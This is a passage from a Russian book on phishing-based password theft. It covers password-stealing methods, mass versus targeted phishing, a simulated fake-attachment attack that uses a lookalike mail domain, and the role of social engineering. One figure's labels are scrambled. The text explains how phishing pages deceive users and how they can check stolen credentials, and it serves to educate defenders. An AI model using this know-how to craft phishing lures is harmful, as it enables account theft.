6) в результате перехвата и расшифровки трафика программами – снифферами (Sniffer), анализаторами трафика, при непосредственном доступе к локальной сети пользователя;
7) использованием технических уязвимостей программного
обеспечения;
8) организацией фишинг-атаки.
Основные методы получения пароля доступа представлены на
рис. 1.1.
Метод подбора пароля (brute-force) в настоящее время мало чем
поможет. Многолетняя пропаганда, призывающая создавать сложные
пароли, сделала-таки свое дело, и пользователи стали осторожнее при
выдумывании невероятно сложных паролей, состоящих из букв различного регистра и цифр. Эта мысль вбита в голову многочисленными советами специалистов с экранов телевизора и колонок журналов.
Действительно, некоторое время назад большинство пользователей использовало довольно простые пароли, представляющие собой различные памятные даты, чаще всего дни рождения, клички
домашних животных, номера телефонов или набор стоящих рядом
кнопок клавиатуры. Основываясь на таких предпочтениях большинства пользователей, злоумышленниками довольно быстро были
сгенерированы так называемые словари, предназначенные для осуществления по ним атаки – подбора пароля с использованием спе1

Кейлогер (от англ. key – клавиша и logger – регистрирующее устройство) – реа­
лизованный в виде программного обеспечения или аппаратного устройства
инструмент регистрации и хранения действий пользователя, таких как нажатие клавиш на клавиатуре и манипуляции с мышью.

22

Хищение паролей методом фишинг-атак

циальных и довольно примитивных программ, которые автор писал
в средней школе.
Уяз
в

им

нг-

тер
не
Ин

па

ро
ля

ата

Пароль

о
осн

н

ци х
спе ески r)
а
ч e
к
ов ни gg
ан х тех eylo
т
с
k
У ны в (
альредст
с

Уд
а

»

ле

ка

О

еП

о
ед

Вр

чер
ез

О

о, в

ши

еП

нн

Фи

сно

том

ор

но

чи
сле

По
дб

О
т

ед
о

ие

ван
ьзо ит
л
л
по
Ис ути

ьП

ом
еск
зич .)
фи и пр
м«
но ПК
ен е (
ств ем
ед сист
оср к
еп пе
и н сту
Пр до

Вр

ост

Уязвимость ПО

Фишинг-атака

Перехват трафика

Уязвимость ПО

При доступе к локальной сети

Рис. 1.1. Способы несанкционированного получения учетных данных

Метод получения пароля путем подбора по словарю или перебора
символов применяется и сегодня. К примеру, он часто используется
для получения доступа к корпоративным сайтам небольших компаний, которые работают на бесплатных популярных движках, или для
получения доступа к многочисленным информационным системам.
Такой метод используется также для вскрытия защищенных паролем архивов, получения удаленного доступа к операционным системам, например по RDP1, вскрытия зашифрованных томов или
файлов на носителях компьютерной информации.
1

RDP, англ. Remote Desktop Protocol – протокол удаленного рабочего стола.

Методы несанкционированного получения пароля

23

При этом метод подбора пароля занимает много времени, а если
учесть, что попался пароль не из словаря, то этот процесс подбора
может занять дни, недели, месяцы, годы. Однако нужно отметить,
что профессиональными взломщиками используются для атаки
распределенные средства, размещенные на нескольких ресурсах
и обладающие значительными вычислительными мощностями,
способными вскрывать методом подбора даже зашифрованные
с использованием криптографии данные, не говоря уже о серверах,
сетевом оборудовании или CMS-системах. Но это исключительные
случаи.
Установленные системы блокировки пользователей и ресурсов
после многократных попыток неудачных авторизаций сделали применение многих программ и скриптов, предназначенных для брутфорса или гибридной атаки, практически бесполезными.
Метод неправомерного доступа с использованием вредоносных
программ сопряжен с комплексом затрат, связанных с частой необходимостью модификации исходного кода, малым процентом
эффективности в силу широкого использования программно-аппаратных средств защиты, используемых как на стороне сервера,
предоставляющего интернет-сервис, так и на стороне пользователя-жертвы.
Как правило, для осуществления хищения пароля с использованием вредоносных программ требуются несколько различных типов
вредоносного ПО, оптимизация под многочисленные операционные системы и программное окружение.
Недавно скомпилированный1 вредоносный файл со временем
становится детектируемым антивирусным программным обеспечением, и проведение с его использованием нескольких эффективных
атак не представляется возможным.
Третий, четвертый и пятый методы требуют близкого контакта с жертвой или средой ее обитания, поэтому имеют узкий, но,
безуслов­но, действенный спектр применения и станут, наверное,
темой одного из следующих обсуждений. Использование программных утилит, перехват трафика, а также использование аппаратных

1

Компиляция – процесс перевода (трансляции) исходного кода компьютерной
программы с предметно-ориентированного языка на машинно-ориентированный язык.

24

Хищение паролей методом фишинг-атак

келогеров и других специальных технических средств, предназначенных для несанкционированного получения информации, заслуживают отдельного рассмотрения, потому как эффективно применяются в комплексе атак при осуществлении конкурентной разведки
и промышленном шпионаже.
Метод, включающий в себя изучение функционирования программно-аппаратных средств и поиск уязвимостей, позволяющих
получить неавторизованный доступ, занимает отдельную нишу
и является довольно специфическим в силу его безусловной интеллектуальной составляющей. В большинстве случаев такие уязвимости обнаруживают и используют лица и компании, не относящиеся к криминальному миру, если только мы не рассматриваем
возможности слива (продажи) наличия и описания эксплуатации
уязвимости, как это иногда случается. На памяти автора подобного рода сливов уязвимостей, приведших к хищениям денежных
средств посредством эксплуатации уязвимости платежных систем,
было всего несколько, и те были проданы злоумышленникам действующими сотрудниками или разработчиками самих информационных систем.
Переходим к последнему озвученному способу неправомерного
доступа. Несанкционированный и, что самое главное, скрытый доступ к содержимому электронного почтового ящика, как и доступ
к любой учетной записи, эффективнее всего получить методом фишинг-атаки.
Как говорил технический директор по безопас­ности Symantec –
плохие парни обычно не пытаются использовать технические уязвимости, – «Вам не нужно технических навыков, чтобы найти одного человека, который может открыть вложение, которое содержит
вредоносный контент». Только 3% вредоносных программ пытаются использовать технический изъян программного обеспечения.
Остальные 97% пытаются обмануть пользователя посредством социальной инженерии1. Или как поется в песенке разбойников из
фильма «Айболит-66»: «Нормальные герои всегда идут в обход».
Есть несколько веских причин, по которым предлагается внимательно рассмотреть проблемы фишинга.
1

https://digitalguardian.com/blog/social-engineering-attacks-common-techniques-howprevent-attack.

Особенности фишинга

25

Особенности фишинга
Эффективность фишинга
Фишинг на самом деле эффективен. Программные комплексы автоматической защиты могут частично спасти от массового (слепого)
фишинга, но не от целенаправленного (персонифицированного).
На волне постоянно всплывающих компроматов, шантажей, аукционов по продаже частной переписки и различного рода разобла­
чений хорошо зарабатывают специалисты информационной
безопас­ности и дистрибьюторы специализированного программного обеспечения, к которым обращаются потенциальные жертвы
с целью защитить свои тайны.
Тем временем практика показывает, что большая часть неправомерных вторжений по-прежнему реализуется с использованием
фишинг-атак.
Доступность фишинга
Реализация фишинг-атаки, в зависимости от ее вида, конечно, может быть осуществлена обычным человеком, не имеющим глубоких
технических познаний, купившим «инструкцию по применению»
и сопутствующие инструменты (о которых мы поговорим дальше)
на одном из множества мошеннических интернет-форумов, потратив не более тысячи баксов.
Незнание и недопонимание
В обществе, несмотря на регулярно и широко освещаемые инциденты, касающиеся содержимого электронной почты известных
лиц, мало кто задумывается о механике взлома. Тот же, кто задумывается, скорее всего, приходит к выводу, что совершенный доступ
к чужой электронной почте, а тем более почте известной персоны
или крупной компании осуществлен в результате сложнейшей хакерской атаки.
Сами же потерпевшие продолжают наступать на грабли, становясь
жертвами фишинг-атак снова и снова. Поэтому Интернет и средства
массовой информации не устают радовать читателей отрывками
переписки и различного рода фотографиями, не предназначенными
для всеобщего обозрения.

26

Хищение паролей методом фишинг-атак

Безнаказанность
Малая доля вероятности быть вычисленным и высокий шанс избежать ответственности.
Для того чтобы наказать преступника, его нужно сначала поймать, а чтобы поймать – нужно вычислить. Сложность вычисления
киберпреступников вытекает из используемых ими методов и инструментов (которые будут рассмотрены в главе 3 «Особенности
киберпреступлений»).
Но и на вычислении киберпреступников сложности не заканчиваются, потому что у сотрудников правоохранительной и судебной
системы знание о фишинге весьма поверхностное, в связи с чем
трактовка законодательных норм осуществляется своеобразно и по
этой же причине киберпреступления часто неверно квалифицируются и, так скажем, недооцениваются.
В этой части проблема имеет несколько ключевых особенностей
как с технической стороны, так и с законодательной и правоприменительной, которые следует отметить отдельно, и это будет сделано
в последующих частях.

Виды фишинговых атак
Рассмотрим виды фишинговых атак и разберем детально механизм
функционирования фишинга – от создания и до его применения
(или наоборот).
Учитывая, что электронный почтовый адрес является классической мишенью для такого типа атак, интереснее и целесообразнее
рассмотреть фишинг-атаки именно на электронную почту.
Итак, разграничим, насколько это возможно, два основных направления, или, можно сказать, вида фишинга.
На первый взгляд, «фишинг – он и в Африке фишинг», но классификация, по которой необходимо различать два существующих
вида, обусловлена основной характеристикой этого метода, как
и любого другого преступления, – его опасностью. Опасным может
быть любой предмет, даже карандаш, все зависит от обстоятельств.

Слепой фишинг
Первый, самый распространенный вид фишинга – это «слепой»
фишинг, более распространенный как услуга, которая предостав-

Слепой фишинг

27

ляется довольно широко. Этот вид фишинга также называют «массовым» фишингом.
Стоит ввести в поисковике что-нибудь вроде «взлом почты», тут
же найдутся интернет-витрины, предоставляющие «взлом почты
на заказ» за стоимость от 50 до 500 долларов США, с обещанием
предоставить доступ к любому почтовому ящику или аккаунту, не
изменяя пароля учетной записи жертвы, с сохранением полной анонимности и отсутствием предоплаты.
Что бы там не обещали представители этого незаконного бизнеса,
какие бы сказки про свои умения и методы не рассказывали, все
они взламывают почту одним способом – фишингом. И автор в этом
убедился железобетонно, проверив их всех.
Представители этого вида фишинга несильно заморачиваются по
поводу эффективности проводимых атак, здесь все поставлено на
конвейер, рассылки писем осуществляются посредством различных
спам-технологий. Держателям таких сайтов ежедневно поступают
сотни заказов, жертвам рассылаются шаблонные варианты атак,
заводящие на уже хромающие от старости (а иногда от кривых рук)
фишинг-движки, также называемые фэйки1. К анализу фишингдвижков мы вернемся чуть позже.
Процент успешного получения пароля такими дельцами не так
велик и постоянно снижается. Этот факт не очень беспокоит данную
группу киберпреступников, ибо в большинстве своем рассматривае­
мая деятельность не является их основным доходом, а затраты на
проведение таких атак быстро отбиваются. Все это разберем в следующих частях.
Массовый фишинг начал использоваться более десяти лет назад, когда мошенники маскировали свои фишинговые письма под
официальные, направленные, к примеру, от имени администрации
почтового сервиса или службы поддержки, а украденные почтовые
адреса использовались для рассылки спама, кражи аккаунта в социальной сети, реже – для кражи денег с электронных кошельков
и банковских карт.
Известными темами фишинговых сообщений тех лет были уведомления о закрытии, открытии, блокировке банковских счетов
1

Фэйк – от англ. fake [feık] – поддельный, фальшивый, ложный, фиктивный, подставной.

28

Хищение паролей методом фишинг-атак

и пластиковых карт, извещения из государственных органов (налоговой, ГИБДД и прочих государственных структур). В письмах
массового фишинга пользователей также просили обновить свои
данные или войти в аккаунт, чтобы прочесть специальное сообщение.
Некоторые перечисленные темы используются и по сей день.
Официально Центробанк говорит об угрозе фишинга с 2006 года
в информационном письме1, указывая на работу маскирующихся
веб-сайтов, направленных на «заманивание» пользователей с целью
раскрытия конфиденциальной информации посредством использования поддельных веб-сайтов.
Самая главная особенность массового, или слепого, фишинга заключается в том, что атакующий понятия не имеет, кого, собственно, атакует. Поэтому изначальное происхождение данного метода –
фишинг – вполне оправдывает свое значение.

Целенаправленный фишинг
Второй и самый опасный вид фишинга – это «целенаправленный»,
«персонализированный», или «точечный», фишинг. Именно этот вид
фишинга является одним из основных инструментов в оружейном
арсенале кибершпионажа.
Отличий от первого рода фишинга довольно много.
Для проведения персонализированной атаки рассылаемые сообщения не будут маскироваться под службу поддержки сервиса,
в связи с чем большинство советов, которые приходится встречать,
направленных на то, чтобы не стать жертвой фишинга, просто не
подходит при целенаправленной фишинговой атаке.
Целенаправленный фишинг отличает прежде всего индивидуальный подход к его реализации. Все начинается с изучения персоны
и ее окружения. Изучается стилистика переписки, например посредством получения доступа к возможным партнерам, родственникам,
подчиненным выбранной цели.
Для индивидуальной фишинговой атаки специально собираются движки (фэйки), с использованием персональной информации,
фотографий и другой атрибутики.
1

Информационное письмо Департамента внешних и общественных связей Банка России: http://www.cbr.ru/press/PR/?file=060707_1441352.htm.

Целенаправленный фишинг

29

Часто для таких атак привлекаются учетные записи лиц, с которыми выбранная цель регулярно осуществляет переписку и обмен
файлами. Доступ к таким «близким» учетным записям обычно заблаговременно получен первым способом фишинга.
С целью изучения потенциальной жертвы злоумышленниками
осуществляется комплекс специальных мероприятий, включающий
в себя создание различного рода информационных ресурсов, осуществление атак на окружающих персону лиц и даже вступление
с персоной в переписку. Некоторым из этих мероприятий будет
уделено внимание в дальнейших частях книги.
Подготовка к целенаправленной фишинговой атаке может длиться несколько месяцев и стоить сотни тысяч рублей, при этом проведение обычной массовой (слепой) фишинг-атаки не стоит практически ничего.
Финансовая выгода от целенаправленного фишинга гораздо
выше, и все затраты окупаются. Целями такой фишинг-атаки становятся, как правило, политические деятели, известные медийные
персоны и бизнесмены.
Популярные хакерские группировки возглавляются сейчас «менеджерами», управленцами, которые тщательно продумывают
векторы атаки и, как правило, играют на всех фронтах, где можно
заработать. Все они, возможно, выгодны тем или иным властным
структурам, но кем бы они ни были, методы для кибершпионажа
используются одни и те же.
Практически все хакерские атаки, о которых так часто говорится
в средствах массовой информации и с политических трибун, в той
или иной мере содержали в комплексе целенаправленные фишингатаки.
О целенаправленном фишинге всерьез и по всему миру заговорили с 2011–2012 годов, это находит свое отражение в публичных
отчетах копаний, занимающихся информационной защитой1.
Ну и как не вспомнить нашумевшие в 2016 году атаки, связанные
с выборами, если верить размещенному в сети документу2, они также были совершены с использованием фишинга.
1

2

https://www.cisco.com/c/dam/global/ru_ru/downloads/broch/ironport_targeted_
phishing.pdf.
https://www.documentcloud.org/documents/3766950-NSA-Report-on-RussiaSpearphishing.html.

30

Хищение паролей методом фишинг-атак

В частности, в опубликованном документе говорится о совершении кибератаки на одного из поставщиков программного обес­
печения, предназначенного для проведения выборов, которая заключалась в рассылке целевых фишинговых сообщений более чем
ста чиновникам из избирательной системы.
Злоумышленники, проводящие целенаправленные фишинговые
атаки, всегда совершенствуют свою тактику и очень часто добиваются своего благодаря социальной инженерии, о которой речь пойдет
позже.
Для полноты картины роль и место фишинга будут рассмотрены
на примере реализации различных комбинированных атак.

1.1. Как это происходит? Фишинг-атака
со стороны пользователя на примере
электронного почтового ящика
Для понимания природы и механизма фишинга нужно рассмотреть
его хоть раз в действии. Нагляднее всего это можно сделать на примере фишинг-атаки на электронные почтовые адреса, осуществ­
ляемой с целью скрытого получения пароля.
Сегодня практически каждый человек использует несколько
элект­ронных почтовых адресов, как корпоративных, так и личных,
зарегистрированных на публичных почтовых сервисах.
На все эти почтовые адреса ежедневно поступают десятки, а то
и сотни сообщений.
Для проведения фишинг-атаки совершенно не важно, на каком
почтовом сервисе, публичном или корпоративном, находится учетная запись потенциальной жертвы.
Человеческий мозг, пользуясь опытным путем закрепленной
связью­между видимым и невидимым, а в данном случае – изобра­
жениями и содержанием, не уделяет достаточного внимания каждому полученному письму и совершаемому действию. Многочисленные клики мышками и ввод данных с клавиатуры – это
автоматические действия, не требующие от опытных пользователей
умственных усилий.

Как это происходит? Фишинг-атака со стороны пользователя

31

Очень часто потерпевшие, обращавшиеся с заявлением о неправомерном доступе к электронному аккаунту или по факту нарушения
тайны переписки, не могли назвать способа, которым воспользовались злодеи, и момент времени, когда именно произошел «взлом»,
однако в процессе проведения исследования или компьютерно-технической экспертизы обнаруживались следы фишинг-атаки.
Для того чтобы раз и навсегда разобраться в механике фишингатаки, посмотрим на происходящее с нескольких сторон.
Сначала со стороны атакуемого пользователя. Рассмотрим конкретный пример, смоделированный на одном из электронных адресов автора.
На почтовый ящик приходит обычное электронное письмо.
На рис. 1.2 в списке входящих писем содержится письмо от ООО
«Магнит» с темой «Заказ», имеющее во вложении файл.

Рис. 1.2. Входящее письмо от «ООО “Магнит”» с темой «Заказ»
в интерфейсе электронной почты

Если владелец электронного адреса откроет данное письмо, то
оно будет выглядеть в браузере, как показано на рис. 1.3.

32

Хищение паролей методом фишинг-атак

Рис. 1.3. Вид электронного письма

Как можно заметить, тело письма содержит текст «Файл во вложении» и подпись «Алексей Климов».
Интерфейс почтового ящика говорит пользователю о том, что
к электронному письму имеется приложение – файл «3.JPG» размером 2,7 Мб, который пользователь может посмотреть или скачать.
В нижней части отображаемого сообщения также содержится миниатюрное изображение присланного файла.
Пользователь автоматически выполняет действие – нажимает на
изображение, содержащее манящий текст «посмотреть», «скачать»
или изображение – миниатюру документа.
После совершенного действия пользователю открывается следующая страница (см. рис. 1.4), на которой указаны логин пользователя, дополнительная информация о файле, находящемся во
вложении, и возможные варианты продолжения действий: скачать,
посмотреть.

Как это происходит? Фишинг-атака со стороны пользователя

33

Рис. 1.4. Страница, отображаемая при переходе по ссылке в письме

При нажатии на кнопку «Продолжить» пользователь наблюдает
процесс авторизации и подключения к почтовому серверу, как показано на рис. 1.5.

Рис. 1.5. Процесс авторизации

34

Хищение паролей методом фишинг-атак

В силу «технических» причин почтовая система просит пользователя повторить авторизацию. Окно авторизации на рис. 1.6 уже
содержит логин пользователя, и требуется только ввести пароль для
продолжения.

Рис. 1.6. Окно повторной авторизации

Пользователь вводит в появившемся окне пароль, получает желаемый файл, возвращается к входящим сообщениям своего элект­
ронного ящика и продолжает обычную работу. Ни одна собака не
зарычала, антивирусные системы безмятежны.
Понятное дело, что раз мы тут говорим о фишинге, скорее всего,
в это время уже выполняется несанкционированное копирование
всей переписки пользователя, документов и фотографий, проверяется доступ к закрепленным за аккаунтом сервисам, проводится
поиск среди переписки по ключевым словам с целью обнаружения
компромата, фильтруются письма с целью отыскания реквизитов,
данных авторизации к платежным системам и корпоративным сер-

Как это происходит? Фишинг-атака со стороны пользователя

35

висам и другим интересным вещам, коих так много содержит аккаунт каждого из нас.
И происходит это потому, что пароль пользователя украден.
Вернемся к началу и снова рассмотрим поступившее от «ООО “Магнит”» письмо с темой «Заказ», якобы имеющее во вложении файл.
На самом деле письмо содержит текст «Файл во вложении» и «Алексей Климов». Никаких файлов во вложении нет, а есть два интегрированных в письмо изображения, имитирующих наличие вложения.

Рис. 1.7. Изображение информации о прикрепленном файле

Рис. 1.8. Изображение прикрепленного файла

Изображения изготовлены в полном соответствии со стилистикой
интерфейса почтового сервиса и ничем себя не выдают. Заметить
подвох довольно сложно, тем более что система почтового сервера
такова, что при наведении на данные изображения пользователь
может увидеть ссылку вида:
https://proxy.imgsmail.ru/?email=**0inbox.ru&e=1498379070&h=9-c-pc-Us7zj
iMuCsJ7qKQ&url171=cnUtbXguZW1haWwvaW1nL2ltZzEucG5n&is_https=0,

при этом ресурс https://proxy.imgsmail.ru/ является официальным ресурсом почтового сервера.

36

Хищение паролей методом фишинг-атак

Страница, на которой указаны логин пользователя, дополнительная информация о файле – вложении и возможные варианты
продолжения (скачать, посмотреть), – на самом деле уже страница
фишинг-движка, в данном случае расположенная по адресу:
http://e.mail.ru-cgi-bix.ru/files/?Login=&Domain=.ru&id=12433644800000023
780&msg=bWFpbC5ydQIIZWxlbmFfcGFy

Или проще: http://e.mail.ru-cgi-bix.ru/files/. Доменное имя e.mail.
ru-cgi-bix.ru принадлежит злодею, а не официальному почтовому
сервису, хотя и содержит нечто похоже в написании.
Никакой авторизации при вводе пароля не происходит, анимированный в стилистике почтового сервиса бегунок просто изящно
пробегает для пущей достоверности происходящего процесса соединения и выдает вполне обычное окно авторизации, также являю­
щееся частью фишинг-движка.
После данной «авторизации» пользователь переадресовывается
обратно на официальный сервер, к себе в почтовый ящик, а необходимые данные: пароль с учетной записью и доменным именем –
программа (скрипт), входящая в состав фишинг-движка, записывает
в нужный файл или отсылает на специальный адрес электронной
почты или сервер злодея.
Как такового перемещения с официального почтового сервиса на
фишинг-движок пользователь не замечает, даже если он осведомлен
о возможностях фишинг-атаки.
Многие специалисты утверждают, что, для того чтобы не попадаться на подобный фишинг, нужно просто убедиться в том, что
перед тобой страница фишингового сайта, для чего достаточно обратить внимание на название сайта в адресной строке браузера:
если оно отличается от оригинального названия сайта, перед вами
фишинговый сайт.
Количество сервисов и возможностей, привязанных к почтовому
аккаунту, довольно велико и постоянно растет, и каждый сервис
содержит какое-либо отличное доменное или субдоменное изображение, например https://mail.yandex.ru, а перейдя к файлам: https://
disk.yandex.ru/client/disk.
Что должен заметить пользователь, когда строка
https://proxy.imgsmail.ru/?email=**&e=1498379070&h=9-c-pc-Us7zjiMuCsJ7qK
Q&url171=cnUtbXguZW1haWwvaW1nL2ltZzEucG5n&is_https=0

Как это происходит? Фишинг-атака со стороны пользователя

37

сменится строкой:
http://e.mail.ru-cgi-blx.ru/files/?Login=&Domain=.ru&id=12433644800000023
780&msg=bWFpbC5ydQIIZWxlbmFfcGFy=0

Пользователь будет заниматься тем, что у него происходит в основном окне браузера. А там все будет происходить красиво, возможно, даже интригующе…
Фишинговый сайт – это не какая-то одинокая страница в Интернете, которая внешне не отличается от оригинального сайта, это
связка нескольких страниц, скриптов, сообщений, основанная на
социальной инженерии и имеющая своей целью заполучить пароль
незаметно для пользователя, в процессе сопровождения жертвы по
определенному алгоритму действий.
Строка браузера, кроме доменного имени, содержит набор непонятных для большинства пользователей цифр и символов, поэтому
до анализа точного написания доменного имени просто никому
нет дела.
Еще один часто встречаемый совет – можно ввести любой вымышленный адрес электронной почты и придуманный пароль, при
этом если сайт ненастоящий, то он примет введенные данные как
верные и произведет переадресацию на настоящий сайт.
Практическое применение данного совета весьма интересно, то
есть пользователь должен всегда при необходимости авторизации
вводить разные пароли? При этом если есть сомнение, зачем вообще что-то вводить?
Здесь приходится также возразить и обратить внимание на то,
что разработка фишинг-движков не стоит на месте и вводимые
пользователем данные – логин и пароль – можно проверить на корректность несколькими функциями. В языке PHP, например, для
установления соединения можно использовать сетевую функцию
fsockopen, и пример фишинга с применением этой функции будет
рассмотрен ниже.
Пропагандируемые утверждения, уверяющие, что антивирусы
блокируют фишинговые атаки, официальные сайты сервисов блокируют переход по фишинговым ссылкам, антиспам-фильтры почтовых сервисов распознают фишинговые письма и, в конце концов,
средства борьбы с фишингом предусмотрены во многих браузерах
и почтовых клиентах, на практике действительны только при сле-

38

Хищение паролей методом фишинг-атак

пых фишинг-атаках или при использовании злоумышленниками
старых доменных имен, которые уже внесены во всевозможные
«черные списки». При персонализированном фишинге автоматические защитные меры малоэффективны.
Кроме того, нестандартный подход, используемый в целенаправленном фишинге, сводит на нет работу антифишинговых технологий, а вложенные кругленькие суммы в информационную безопас­
ность лишь усиливают иллюзию защищенности. Поэтому фишинг
жив и остается самым эффективным средством хищения пароля.
Фишинг – это универсальный инструмент, и основная его фишка – это постоянное видоизменение и совершенствование. Антивирус или другая система может заблокировать доменное имя или
сервер, внеся его в базу данных, но ничто не мешает зарегистрировать злоумышленникам еще десяток-другой доменных имен и разместить их на десятке-другом виртуальных хостингов.
Универсальность фишинга в том, что он никогда не стоит на мес­
те и из него, при желании, можно вылепить все, что угодно. Вот на
рис.1.9, к примеру, вид страницы фишинг-движка с интерфейсом
пользовательских настроек учетной записи:

Рис. 1.9. Страница фишинг-движка
с интерфейсом пользовательских настроек учетной записи

Как это происходит? Фишинг-атака со стороны пользователя

39

Интерфейс, незаконно использующий стиль и дизайн официального ресурса, предлагает пользователю изменить настройки и объем
почтового ящика, а на самом деле так же бессовестно тащит пароль.
Письмо может выглядеть по-разному, но цель всегда одна и та
же. В качестве примера можно привести довольно старый образец
фишингового письма (рис. 1.10) из разряда слепой атаки, стилизованного под работу автоматической службы почтового сервиса:

Рис. 1.10. Фишинг под видом службы почтового сервиса

Или пример фишингового письма, замаскированного под официальные сообщения банка (рис. 1.11).
Переход по ссылке такого письма также может отправить пользователя в путешествие по фэйковым страницам для «обработки».
Приведенный в самом начале пример, с отправкой сообщения
от пользователя ООО «Магнит», вот так может выглядеть на другом
почтовом сервисе – см. рис. 1.12, 1.13.
Еще раз стоит отметить, что для подобного рода атак совершенно
не важно, на каком сервисе располагается учетная запись потен­
циальной жертвы.

40

Хищение паролей методом фишинг-атак

Рис. 1.11. Пример фишингового письма,
замаскированного под официальные сообщения банка

Рис. 1.12. Пример фишингового письма

Роль социальной инженерии в фишинг-атаке

41

Рис. 1.13. Пример фишингового письма

1.2. Роль социальной инженерии в фишинг-атаке
Социальная инженерия представляет собой наибольшую угрозу для
любой системы безопас­ности, в том числе информационной. Об
этом говорится повсеместно и довольно давно, еще до возникновения киберпреступности.
Социальную инженерию правильнее рассматривать как некое
воздействие, которое оказывает влияние на человека, подталкивая
(направляя) его к выполнению определенных действий, которые
могут быть как в его интересах, так и иметь обратные последствия.
Не задаваясь целью глубокого изучения психологии человеческих
поступков, но имея стремление показать фактическое положение
вещей, которое наблюдалось автором в процессе работы, предлагается рассмотреть роль социальной инженерии при проведении
фишинг-атак.
Социальная инженерия во всей красе наблюдается именно в целенаправленном фишинге, хотя ее шаблонно-базовые принципы
есть и в массовых (слепых) атаках.

42

Хищение паролей методом фишинг-атак

Кто-то скажет, может быть: «посмотрел я в Интернете примеры
фишинг-писем, и отлично, меня теперь не обмануть». Однако социальная инженерия в руках злоумышленников – это больше искусство, чем наука. Неизвестно, можно ли этому искусству научить
настолько, чтобы человек смог применять этот инструмент на практике, применяя повсюду, где это может пригодиться.
Человеческая психология всегда была уязвимостью, эксплуатируемой во все времена преступниками и аферистами различного толка.
Настали времена использования социальной инженерии и в киберпреступлениях, в частности при получении неправомерного доступа
к электронным почтовым адресам и другим аккаунтам: вместо того
чтобы пытаться найти уязвимость программного обеспечения, взломщик может заставить жертву сообщить свой пароль самостоятельно.
Как уже говорилось, человеческий мозг, пользуясь опытным путем закрепленной связью между видимым и невидимым, а в данном случае – изображениями и содержанием, не уделяет внимания
каждому полученному письму.
Создание тематических писем и разработка персонализированных фэйков – задача увлекательная и требует от нападающего дос­
конального знания не только интерфейса почтового сервиса либо
другой атакуемой системы, но и алгоритма действий пользователя
при тех или иных обстоятельствах.
Просто так украсть пароль, воспользовавшись фишингом, не
столь важно, сколь сделать это незаметно для пользователя. Важность момента заключается в том, чтобы пользователь не заподоз­
рил чего-нибудь неладного и не сменил пароль, а то и вовсе не удалил учетную запись.
Если атака проведена правильно, то пользователь ни о чем не
догадывается, а почтовый адрес находится под контролем и может
использоваться в дальнейшем для совершения различных преступ­
лений, как в отношении владельца электронного адреса, так и в отношении организации, в которой он работает, или круга лиц, с кем
он осуществляет переписку и обмен данными.
Использование социальной инженерии при фишинг-атаке осно­
вано на понимании взаимодействия человека с компьютерной техникой, человека с программным обеспечением.
История фишинга, наверное, начинается в Древней Греции, во
времена неудачной десятилетней осады Трои. Когда, согласно ми-

Роль социальной инженерии в фишинг-атаке

43

фам, греческая армия решила отступить, солдаты собрали вещички,
оставив осажденным фишинговое письмо – огромную деревянную
статую благородной лошади.
Троянцы письмо открыли (или ворота крепости) и кликнули по
ссылке (то есть завезли к себе домой лошадку), прочитали сообщение типа «Спасибо за войну. До свидания», после чего пошли спать.
В это время небольшой отряд греческих солдат, сегодня состоящий
из одного сутулого мальчика в очках, повылезал из лошадки, открыл
городские ворота (собрал все пароли, информацию о сетевом окружении и безопас­ности) и впустил остальную часть греческой армии,
которая под покровом ночи украла много ценной конфиденциальной информации, осуществила переводы на кругленькие суммы на
офшорные счета или счета фирм-однодневок…
Греки полностью разрушили Трою, а оставшиеся в живых троянцы жили с мыслью о том, на кой черт они ежегодно тратили огромные средства на обеспечение информационной и экономической
безопас­ности, если по собственной глупости поступают так, как того
хотят кибершпионы.
Мифическая или нет история про Трою, но она олицетворяет пример социальной инженерии, который успешно используется и сегодня.
Когда человек производит авторизацию в своем электронном
поч­товом адресе, у него складывается полное ощущение того, что
он находится один на один со своими секретами в закрытом кабинете и нет никаких бесконечно длинных коммутационных проводов,
ползущих по вентиляционным шахтам, темным чердакам и подземным лабиринтам, нет целых тонн сетевого и серверного оборудования, гигабайтов сложного программного обеспечения и алгоритмов.
Иллюзия настолько прочная и всем привычная, что позволяет
с легкостью похитить пароль, какой бы сложный и длинный он ни
был. Имеющиеся установленные средства программно-аппаратной
защиты только усиливают эффект иллюзии и необоснованного чувства безопас­ности.
Если пользователь незнаком с механизмом проведения фишингатак и их разновидностями, попасться на удочку ничего не стоит.
В ранних проявлениях фишинга рассылались письма о временной блокировке аккаунта или его удалении. Довольно весело было
злодеям, когда они осуществляли фишинговые спам-рассылки пи-

44

Хищение паролей методом фишинг-атак

сем, содержащие угрозы пользователям заблокировать их аккаунты
навсегда, если те срочно не пройдут повторную авторизацию в связи с поступившими жалобами или подозрением администрации
ресурса в использовании почтового ящика для спам-рассылок.
В годах 2002–2008 эффект от такого фишинга был потрясающий.
С одной стороны, сам термин «спам» в России стал ругательством,
поскольку использовался всеми без исключения «впаривателями»
всего, что можно было только впарить. С другой – уровень доверия
к программному обеспечению, интернет-сервисам и компьютерной технике был значительно выше и вызывал во многих чувство,
близкое к уважению.
Был период, когда злоумышленники массово заманивали пользователей на созданные фэйки банков, где под различными предлогами (смены программного обеспечения дистанционного банковского обслуживания, противодействия мошенничеству) заставляли
пользователя вводить данные для доступа к своему аккаунту.
Время шло, пользователи становились опытнее, менялись системы
защиты. Но социальная инженерия помогла мошенникам обходить
и двухфакторную аутентификацию, и SMS-оповещения. При этом
комплекс атаки мог включать совершение звонков потенциаль­ным
жертвам, например с просьбой ввести SMS-код, якобы для отмены
ошибочно направленного в их адрес перевода.
В некоторых случаях на фишинговых сайтах создавались поля для
ввода значения из таблицы переменных кодов. Такой трюк делали,
например, братья Евгений и Дмитрий Попелыши1, которые признаны виновными в совершении преступлений, предусмотренных
ч. 2 ст. 272 (неправомерный доступ к охраняемой законом компьютерной информации), ч. 1 ст. 273 (создание, использование и распространение вредоносных компьютерных программ) и ч. 4 ст. 159
(мошенничество, совершенное группой лиц по предварительному
сговору с причинением ущерба в особо крупном размере) УК РФ.
Роль социальной инженерии в фишинг-атаке всегда заключается
в подведении пользователя к вводу необходимых данных или совершению необходимых действий.
Учитываются действия пользователя, а при совершении целенаправленной фишинг-атаки учитывается весь собранный информа1

«Вынесен приговор по первому в России уголовному делу о компьютерном
“фишинге”». URL: https://мвд.рф/news/item/147552.

Роль социальной инженерии в фишинг-атаке

45

ционный массив о конкретном человеке, разрабатывается сценарий, позволяющий получить пароль, открыть документ, запустить
программу.
В практике встречались случаи, когда злоумышленники должны
были получить доступ к электронной почте одного бизнесмена. Попытки заброса вредоносных программ к успеху не приводили. Злоумышленникам удалось подсунуть жертве магазин автозапчастей,
где бизнесмен зарегистрировался. Вышло так, что бизнесмен не стал
